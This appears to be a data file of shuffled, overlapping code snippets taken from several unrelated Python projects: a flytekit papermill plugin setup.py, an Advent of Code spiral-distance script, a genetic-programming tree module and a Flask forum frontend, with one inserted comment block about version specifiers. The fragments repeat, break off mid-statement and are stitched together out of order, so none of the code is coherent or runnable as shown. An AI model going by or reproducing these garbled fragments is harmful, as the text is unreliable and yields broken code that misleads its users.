flytekit papermill", "Development\", \"Topic :: Software Development :: Libraries\", \"Topic :: Software", "Developers\", \"License :: OSI Approved :: Apache Software License\", \"Programming", "version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"],", "\"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit", "\"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic", "from setuptools import setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\"", "= [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ =", "microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\",", "install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience", "\"Topic :: Software Development :: Libraries\", \"Topic :: Software Development", ":: Software Development :: Libraries\", \"Topic :: Software Development ::", "Software Development\", \"Topic :: Software Development :: Libraries\", \"Topic ::", "author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires,", ":: Software Development :: Libraries :: Python Modules\", ], )", "__version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is", ":: Developers\", \"License :: OSI Approved :: Apache Software License\",", ":: OSI Approved :: Apache Software License\", \"Programming Language ::", ":: 3.7\", \"Programming Language :: Python :: 3.8\", \"Topic ::", ":: Libraries\", \"Topic :: Software Development :: Libraries :: Python", "flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], 
install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended", "\"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\"," ]
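# The pin "flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0" above combines a
# version range with a single-version exclusion. If the syntax is unfamiliar,
# it can be checked with the `packaging` library (added illustration only,
# not part of the original setup.py):
from packaging.specifiers import SpecifierSet
from packaging.version import Version

spec = SpecifierSet(">=0.16.0b0,<1.0.0,!=0.24.0b0", prereleases=True)
assert Version("0.23.0") in spec
assert Version("0.24.0b0") not in spec  # the explicitly excluded build
assert Version("1.0.0") not in spec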
[ "size + 2 top_right = s_size - 3 * size", "= size * size # squared size while (s_size <", "(input > top_left): input_y = input - top_left input_x =", "# bottom horizontal line if (input > bottom_left): input_x =", "- 1 input_y = input - bottom_left elif (input >", "0 input_y = size - input + top_right - 1", "1 input_y = input - bottom_left elif (input > top_left):", "2 ap_y = ap_x print abs(ap_x - input_x) + abs(ap_y", "= 0 input_y = size - input + top_right -", "= 0 elif (input > top_right): input_x = 0 input_y", "- 1 else: input_x = top_right - input input_y =", "= s_size - size + 1 top_left = s_size -", "input input_y = size - 1 ap_x = size /", "top_right - 1 else: input_x = top_right - input input_y", "* size bottom_right = s_size bottom_left = s_size - size", "* size + 3 input_x = -1 input_y = -1", "size + 3 input_x = -1 input_y = -1 #", "s_size - 2 * size + 2 top_right = s_size", "s_size - size + 1 top_left = s_size - 2", "input_y = -1 # bottom horizontal line if (input >", "2 s_size = size * size bottom_right = s_size bottom_left", "top_right - input input_y = size - 1 ap_x =", "input_y = size - 1 ap_x = size / 2", "bottom_left = s_size - size + 1 top_left = s_size", "squared size while (s_size < input): size += 2 s_size", "> top_right): input_x = 0 input_y = size - input", "0 elif (input > top_right): input_x = 0 input_y =", "= s_size - 3 * size + 3 input_x =", "* size + 2 top_right = s_size - 3 *", "input - bottom_left elif (input > top_left): input_y = input", "input - top_left input_x = 0 elif (input > top_right):", "top_right): input_x = 0 input_y = size - input +", "= size - input + top_right - 1 else: input_x", "input + top_right - 1 else: input_x = top_right -", "size / 2 ap_y = ap_x print abs(ap_x - input_x)", "elif (input > top_left): input_y = input - top_left input_x", "if (input > bottom_left): input_x = size - 1 input_y", "= -1 input_y = -1 # bottom horizontal line if", "368078 size = 1 s_size = size * size #", "else: input_x = top_right - input input_y = size -", "= size / 2 ap_y = ap_x print abs(ap_x -", "size - 1 ap_x = size / 2 ap_y =", "line if (input > bottom_left): input_x = size - 1", "< input): size += 2 s_size = size * size", "top_left = s_size - 2 * size + 2 top_right", "# squared size while (s_size < input): size += 2", "3 input_x = -1 input_y = -1 # bottom horizontal", "> top_left): input_y = input - top_left input_x = 0", "2 * size + 2 top_right = s_size - 3", "(input > top_right): input_x = 0 input_y = size -", "1 else: input_x = top_right - input input_y = size", "(s_size < input): size += 2 s_size = size *", "s_size - 3 * size + 3 input_x = -1", "- 3 * size + 3 input_x = -1 input_y", "horizontal line if (input > bottom_left): input_x = size -", "size + 1 top_left = s_size - 2 * size", "s_size bottom_left = s_size - size + 1 top_left =", "bottom_right = s_size bottom_left = s_size - size + 1", "+ 2 top_right = s_size - 3 * size +", "> bottom_left): input_x = size - 1 input_y = input", "#!/usr/bin/env python input = 368078 size = 1 s_size =", "- size + 1 top_left = s_size - 2 *", "top_right = s_size - 3 * size + 3 input_x", "size - 1 input_y = input - bottom_left elif (input", "size # squared size while (s_size < input): size +=", "1 ap_x = size / 2 ap_y = ap_x print", "python input = 368078 size = 1 s_size = size", "input_x = 0 elif (input > top_right): input_x = 0", "= top_right - input input_y = size - 1 ap_x", "1 s_size = size * size # squared size while", "size * size bottom_right = s_size bottom_left = s_size -", "= -1 # bottom horizontal line if 
(input > bottom_left):", "- 2 * size + 2 top_right = s_size -", "input_x = top_right - input input_y = size - 1", "+ 1 top_left = s_size - 2 * size +", "input_x = -1 input_y = -1 # bottom horizontal line", "s_size = size * size # squared size while (s_size", "= input - top_left input_x = 0 elif (input >", "top_left): input_y = input - top_left input_x = 0 elif", "input_y = input - top_left input_x = 0 elif (input", "size += 2 s_size = size * size bottom_right =", "elif (input > top_right): input_x = 0 input_y = size", "* size # squared size while (s_size < input): size", "+ top_right - 1 else: input_x = top_right - input", "input): size += 2 s_size = size * size bottom_right", "ap_x = size / 2 ap_y = ap_x print abs(ap_x", "size = 1 s_size = size * size # squared", "while (s_size < input): size += 2 s_size = size", "= ap_x print abs(ap_x - input_x) + abs(ap_y - input_y)", "+ 3 input_x = -1 input_y = -1 # bottom", "- bottom_left elif (input > top_left): input_y = input -", "top_left input_x = 0 elif (input > top_right): input_x =", "bottom_left): input_x = size - 1 input_y = input -", "bottom_left elif (input > top_left): input_y = input - top_left", "- top_left input_x = 0 elif (input > top_right): input_x", "input_y = size - input + top_right - 1 else:", "= input - bottom_left elif (input > top_left): input_y =", "= s_size bottom_left = s_size - size + 1 top_left", "= 368078 size = 1 s_size = size * size", "- input + top_right - 1 else: input_x = top_right", "-1 # bottom horizontal line if (input > bottom_left): input_x", "bottom horizontal line if (input > bottom_left): input_x = size", "= size * size bottom_right = s_size bottom_left = s_size", "1 top_left = s_size - 2 * size + 2", "size * size # squared size while (s_size < input):", "-1 input_y = -1 # bottom horizontal line if (input", "size - input + top_right - 1 else: input_x =", "= s_size - 2 * size + 2 top_right =", "= size - 1 input_y = input - bottom_left elif", "- input input_y = size - 1 ap_x = size", "ap_y = ap_x print abs(ap_x - input_x) + abs(ap_y -", "= size - 1 ap_x = size / 2 ap_y", "size while (s_size < input): size += 2 s_size =", "input_x = size - 1 input_y = input - bottom_left", "input = 368078 size = 1 s_size = size *", "= 1 s_size = size * size # squared size", "s_size = size * size bottom_right = s_size bottom_left =", "- 1 ap_x = size / 2 ap_y = ap_x", "/ 2 ap_y = ap_x print abs(ap_x - input_x) +", "(input > bottom_left): input_x = size - 1 input_y =", "+= 2 s_size = size * size bottom_right = s_size", "size bottom_right = s_size bottom_left = s_size - size +", "2 top_right = s_size - 3 * size + 3", "input_y = input - bottom_left elif (input > top_left): input_y", "input_x = 0 input_y = size - input + top_right", "3 * size + 3 input_x = -1 input_y =" ]
[ "parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree)", "get_flat_parameters(self): params = [] for tree in self.parameterized_trees: for node", "in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children:", "= underlying_tree if init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct())", "set_params(self, params): self.weight, self.bias = params self.name = self.underlying_tree.name +", "return [tree(*x) for tree in self.parameterized_trees] def __len__(self): return sum(len(tree)", "__init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) #", "racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This makes the assumption", "node in child.in_order(): yield node class ParameterizedIndividual: def __init__(self, parameterized_trees):", "child.in_order(): yield node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees =", "sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used =", "node in tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used +=", "n_used += 2 def get_flat_parameters(self): params = [] for tree", "__call__(self, *x): return self.underlying_tree(*x) * self.weight + self.bias def __len__(self):", "= parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree", "params = [] for tree in self.parameterized_trees: for node in", "makes the assumption that all children of the underlying tree", "set_flat_parameters(self, params): n_used = 0 for tree in self.parameterized_trees: for", "yield node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees", "that the underlying tree has the field .name def __init__(self,", "trees should not be mutated\") def in_order(self): yield self if", "__len__(self): return sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self, params):", "self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0 for tree in", "= self.underlying_tree.name + \" * {} + {}\".format( self.weight, self.bias", "for child in underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct", "for tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0", "in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used : n_used +", "def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree)", "of the underlying tree are in a field .children and", ": n_used + 2])) n_used += 2 def get_flat_parameters(self): params", "else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias = params self.name", "__call__(self, *x): return [tree(*x) for tree in self.parameterized_trees] def __len__(self):", "tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0 for", "+ \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: res", "if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for node in", "prefix) 
return res def _set_dirty(self): raise Exception(\"Parameterized trees should not", "class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def", "ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for tree in self.parameterized_trees]", "@staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x)", "] self.underlying_tree = underlying_tree if init_fct is None: self.set_params([1, 0])", "+ prefix) return res def _set_dirty(self): raise Exception(\"Parameterized trees should", "tree in self.parameterized_trees] def __len__(self): return sum(len(tree) for tree in", "2 def get_flat_parameters(self): params = [] for tree in self.parameterized_trees:", "\"children\"): for child in self.underlying_tree.children: res += child.display(prefix=\" \" +", "ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ] self.underlying_tree = underlying_tree", "load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This makes", "return sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used", "in a field .children and that the underlying tree has", "get_params(self): return [self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x) *", "has the field .name def __init__(self, underlying_tree, init_fct=None, _copy=True): if", "+ self.bias def __len__(self): return len(self.underlying_tree) def display(self, prefix): res", "@staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees]", "child.display(prefix=\" \" + prefix) return res def _set_dirty(self): raise Exception(\"Parameterized", "children of the underlying tree are in a field .children", "self.weight, self.bias ) def get_params(self): return [self.weight, self.bias] def __call__(self,", "# This makes the assumption that all children of the", "parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in", "for tree in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used :", "\" * {} + {}\".format( self.weight, self.bias ) def get_params(self):", "This makes the assumption that all children of the underlying", "class ParameterizedTree(ProgramTree): # This makes the assumption that all children", "self.underlying_tree.children: res += child.display(prefix=\" \" + prefix) return res def", "raise Exception(\"Parameterized trees should not be mutated\") def in_order(self): yield", "underlying_tree if init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def", "if init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self,", "None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias", "def __len__(self): return sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self,", "node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod", "tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used += 2 def", "\"\\n\" if 
hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: res +=", "child in self.underlying_tree.children: res += child.display(prefix=\" \" + prefix) return", "be mutated\") def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for", "*x): return [tree(*x) for tree in self.parameterized_trees] def __len__(self): return", ") @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return", "all children of the underlying tree are in a field", ") def get_params(self): return [self.weight, self.bias] def __call__(self, *x): return", "and that the underlying tree has the field .name def", "_copy=False) for child in underlying_tree.children ] self.underlying_tree = underlying_tree if", "def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] )", "self.bias = params self.name = self.underlying_tree.name + \" * {}", "safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False)", "= 0 for tree in self.parameterized_trees: for node in tree.in_order():", "should not be mutated\") def in_order(self): yield self if hasattr(self.underlying_tree,", "params): n_used = 0 for tree in self.parameterized_trees: for node", "return res def _set_dirty(self): raise Exception(\"Parameterized trees should not be", "+ \" * {} + {}\".format( self.weight, self.bias ) def", "+= 2 def get_flat_parameters(self): params = [] for tree in", "self.parameterized_trees: for node in tree.in_order(): params += node.get_params() return np.array(params)", "in underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct is None:", "def get_params(self): return [self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x)", "ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind):", "from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree):", "underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ]", "ParameterizedTree(ProgramTree): # This makes the assumption that all children of", "self.name = self.underlying_tree.name + \" * {} + {}\".format( self.weight,", "the field .name def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy:", "+= child.display(prefix=\" \" + prefix) return res def _set_dirty(self): raise", "import ProgramTree class ParameterizedTree(ProgramTree): # This makes the assumption that", "a field .children and that the underlying tree has the", "def set_flat_parameters(self, params): n_used = 0 for tree in self.parameterized_trees:", "field .name def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree", "in self.underlying_tree.children: res += child.display(prefix=\" \" + prefix) return res", "def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for", "if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree,", "*x): return self.underlying_tree(*x) * self.weight + self.bias def __len__(self): return", "tree in ind.trees] ) @staticmethod def 
from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def", "_copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first if", "that all children of the underlying tree are in a", "[self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x) * self.weight +", "underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety", "node.set_params(list(params[n_used : n_used + 2])) n_used += 2 def get_flat_parameters(self):", "for node in tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used", "are in a field .children and that the underlying tree", "params self.name = self.underlying_tree.name + \" * {} + {}\".format(", "the underlying tree are in a field .children and that", "self.weight + self.bias def __len__(self): return len(self.underlying_tree) def display(self, prefix):", "in self.underlying_tree.children: for node in child.in_order(): yield node class ParameterizedIndividual:", "return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod def", "for tree in ind.trees] ) @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname))", "tree has the field .name def __init__(self, underlying_tree, init_fct=None, _copy=True):", "return self.underlying_tree(*x) * self.weight + self.bias def __len__(self): return len(self.underlying_tree)", "return len(self.underlying_tree) def display(self, prefix): res = prefix + self.name", "field .children and that the underlying tree has the field", "if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child", "# safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child,", "for child in self.underlying_tree.children: for node in child.in_order(): yield node", "= copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children =", "self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias =", "res = prefix + self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"):", "for tree in self.parameterized_trees: for node in tree.in_order(): params +=", "def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return", "* self.weight + self.bias def __len__(self): return len(self.underlying_tree) def display(self,", "np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class", "def __len__(self): return len(self.underlying_tree) def display(self, prefix): res = prefix", "self.bias] def __call__(self, *x): return self.underlying_tree(*x) * self.weight + self.bias", "ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod def from_pickled_individual(fname):", ".name def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree =", "Exception(\"Parameterized trees should not be mutated\") def in_order(self): yield self", "mutated\") def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for child", ".children and that the underlying tree has the field .name", "underlying tree are in a field .children and that the", "= [ 
ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ] self.underlying_tree", "prefix + self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child", "* {} + {}\".format( self.weight, self.bias ) def get_params(self): return", "self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used : n_used + 2]))", "def display(self, prefix): res = prefix + self.name + \"\\n\"", "the underlying tree has the field .name def __init__(self, underlying_tree,", "hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for node in child.in_order():", "ind.trees] ) @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x):", "init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first", "def __call__(self, *x): return self.underlying_tree(*x) * self.weight + self.bias def", "from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod", "tree in self.parameterized_trees: for node in tree.in_order(): params += node.get_params()", "n_used + 2])) n_used += 2 def get_flat_parameters(self): params =", "the assumption that all children of the underlying tree are", "__init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual(", "import copy import numpy as np from racer.utils import load_pickle", "import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This", "0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias = params", "yield self if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for", "0 for tree in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used", "len(self.underlying_tree) def display(self, prefix): res = prefix + self.name +", "for child in self.underlying_tree.children: res += child.display(prefix=\" \" + prefix)", "in child.in_order(): yield node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees", "[tree(*x) for tree in self.parameterized_trees] def __len__(self): return sum(len(tree) for", "child in self.underlying_tree.children: for node in child.in_order(): yield node class", "assumption that all children of the underlying tree are in", "self.bias def __len__(self): return len(self.underlying_tree) def display(self, prefix): res =", "2])) n_used += 2 def get_flat_parameters(self): params = [] for", "[] for tree in self.parameterized_trees: for node in tree.in_order(): params", "for node in child.in_order(): yield node class ParameterizedIndividual: def __init__(self,", "self if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for node", "__len__(self): return len(self.underlying_tree) def display(self, prefix): res = prefix +", "= prefix + self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for", "res += child.display(prefix=\" \" + prefix) return res def _set_dirty(self):", "in tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used += 2", "self.bias ) def get_params(self): return [self.weight, self.bias] def __call__(self, *x):", "hasattr(underlying_tree, \"children\"): 
underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child in", "= [] for tree in self.parameterized_trees: for node in tree.in_order():", "def __call__(self, *x): return [tree(*x) for tree in self.parameterized_trees] def", "in self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0 for tree", "\"children\"): for child in self.underlying_tree.children: for node in child.in_order(): yield", "for tree in self.parameterized_trees] def __len__(self): return sum(len(tree) for tree", "self.weight, self.bias = params self.name = self.underlying_tree.name + \" *", "display(self, prefix): res = prefix + self.name + \"\\n\" if", "+ 2])) n_used += 2 def get_flat_parameters(self): params = []", "return [self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x) * self.weight", "\" + prefix) return res def _set_dirty(self): raise Exception(\"Parameterized trees", "init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params):", "self.underlying_tree.children: for node in child.in_order(): yield node class ParameterizedIndividual: def", "copy import numpy as np from racer.utils import load_pickle from", "_copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"):", "{}\".format( self.weight, self.bias ) def get_params(self): return [self.weight, self.bias] def", "underlying tree has the field .name def __init__(self, underlying_tree, init_fct=None,", "params): self.weight, self.bias = params self.name = self.underlying_tree.name + \"", "not be mutated\") def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"):", "self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias = params self.name =", "= params self.name = self.underlying_tree.name + \" * {} +", "in self.parameterized_trees] def __len__(self): return sum(len(tree) for tree in self.parameterized_trees)", "return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for tree in", "self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for", "ProgramTree class ParameterizedTree(ProgramTree): # This makes the assumption that all", "prefix): res = prefix + self.name + \"\\n\" if hasattr(self.underlying_tree,", "copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [", "self.underlying_tree(*x) * self.weight + self.bias def __len__(self): return len(self.underlying_tree) def", "in ind.trees] ) @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self,", "underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct is None: self.set_params([1,", "<filename>racer/methods/genetic_programming/parameterized.py<gh_stars>1-10 import copy import numpy as np from racer.utils import", "def set_params(self, params): self.weight, self.bias = params self.name = self.underlying_tree.name", "res def _set_dirty(self): raise Exception(\"Parameterized trees should not be mutated\")", "tree in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used : n_used", "import numpy as np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree", "hasattr(self.underlying_tree, \"children\"): for 
child in self.underlying_tree.children: res += child.display(prefix=\" \"", "self.underlying_tree = underlying_tree if init_fct is None: self.set_params([1, 0]) else:", "in self.parameterized_trees: for node in tree.in_order(): params += node.get_params() return", "self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children:", "racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): #", "numpy as np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import", "from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for tree", "{} + {}\".format( self.weight, self.bias ) def get_params(self): return [self.weight,", "as np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree", "n_used = 0 for tree in self.parameterized_trees: for node in", "self.underlying_tree.name + \" * {} + {}\".format( self.weight, self.bias )", "\"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children", "child in underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct is", "is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight,", "def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for child in", "self.parameterized_trees] def __len__(self): return sum(len(tree) for tree in self.parameterized_trees) def", "tree are in a field .children and that the underlying", "def _set_dirty(self): raise Exception(\"Parameterized trees should not be mutated\") def", "+ {}\".format( self.weight, self.bias ) def get_params(self): return [self.weight, self.bias]", "+ self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child in", "first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for", "if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: res += child.display(prefix=\"", "_set_dirty(self): raise Exception(\"Parameterized trees should not be mutated\") def in_order(self):", "def get_flat_parameters(self): params = [] for tree in self.parameterized_trees: for", "underlying_tree = copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children", "parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod def from_pickled_individual(fname): return", "from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This makes the", "[ ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ] self.underlying_tree =" ]
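# A small usage sketch for the classes above, showing the flat-parameter
# round trip. The stub node type is hypothetical (the real project wraps
# ProgramTree instances); it only exposes the .name/.children/__call__/__len__
# surface that ParameterizedTree relies on.
class _ConstNode:
    def __init__(self, name, value, children=()):
        self.name = name
        self.value = value
        if children:
            self.children = list(children)

    def __call__(self, *x):
        return self.value  # constant leaf, ignores inputs

    def __len__(self):
        return 1 + sum(len(c) for c in getattr(self, "children", []))

ind = ParameterizedIndividual(
    parameterized_trees=[ParameterizedTree(_ConstNode("root", 2.0))]
)
print(ind.get_flat_parameters())  # [1 0]: identity weight/bias per node
ind.set_flat_parameters(np.array([3.0, 0.5]))
print(ind(0))                     # [6.5] == 2.0 * 3.0 + 0.5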
[ "redirect(url_for('frontends.home')) next = '' if request.method == 'GET': if 'next'", "to his or her original place before logging in \"\"\"", "Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted", "as search_module # don't override function name from base.users.forms import", "get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST'])", "left off if so user = User.query.filter_by(email=form.email.data).first() # we use", "her original place before logging in \"\"\" if g.user: return", "or password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST'])", "= base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\"", "search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count()", "\"\"\" We had to do some extra work to route", "if subreddit else Thread.query # Filter by user subs logger.info(g.user)", "base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type == 'hot': base_query", "= subreddit_subs() for subreddit in subreddit_list: sform = sub_form() sform.sub_name", "db.session.commit() session['user_id'] = user.id flash('Thanks for signing up! Please confirm", "function name from base.users.forms import RegisterForm, LoginForm from base.users.models import", "logged in send them home return redirect(url_for('frontends.home')) next = ''", "import search as search_module # don't override function name from", "'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata)", "page \"\"\" if g.user: # If the user is logged", "Subreddit.query.all() form = None if g.user: if request.form: form =", "= user.id 